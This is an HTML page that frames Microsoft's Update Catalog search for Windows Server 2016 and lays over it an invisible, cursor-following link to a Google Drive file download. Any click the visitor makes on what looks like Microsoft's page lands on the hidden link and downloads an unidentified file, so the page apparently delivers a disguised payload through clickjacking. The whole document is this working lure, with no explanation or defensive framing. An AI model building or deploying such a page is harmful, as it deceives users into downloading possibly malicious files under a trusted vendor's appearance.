<!DOCTYPE html>
<html lang="en" dir="ltr">
<head>
    <meta charset="utf-8">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <title></title>
    <style media="screen">
        body {
            /* margin: 0; */
        }
        div {
            color: transparent;
            border: none;
            position: absolute;
            width: 100px;
            height: 100px;
        }
        iframe {
            border: none;
            position: absolute;
            width: 100%;
            height: 100%;
        }
        a {
            /* background-color: black; */
            color: black;
            display: block;
            width: 100px;
            height: 100px;
        }
    </style>
</head>
<body>
<iframe src="https://www.catalog.update.microsoft.com/Search.aspx?q=Windows%20Server%202016" width="" height=""></iframe>
<div class="" id="demo2">
    <a href="https://drive.google.com/uc?export=download&id=18vHjYrDoGZD-kQNHPqs9KepguDJxb9wh">Click here</a>
</div>

<script type="text/javascript">
    window.onmousemove = function(e) {
        var m = document.getElementById('demo2');
        m.style.left = e.clientX - 30 + 'px';
        m.style.top = e.clientY - 30 + 'px';
    }
</script>

</body>
</html>